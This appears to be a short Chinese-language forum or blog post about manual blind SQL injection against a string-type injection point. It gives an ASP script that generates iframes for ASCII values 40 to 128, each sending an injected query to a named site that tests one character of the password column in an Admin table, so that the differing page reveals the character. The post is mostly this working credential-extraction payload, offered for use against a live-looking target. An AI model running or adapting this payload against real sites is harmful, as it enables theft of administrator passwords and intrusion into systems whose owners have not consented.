遇到一个注入点 是字符型的

测试了几个工具 貌似都不行

那就只有手工了

大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的

所以想到这个

<%

for s=40 to 128
    response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&")  and '1'='1""></iframe>"
next

%>

这样一下就能显示所以存在的可能 就能很方便的查看 哪个值对应的页面有所不一样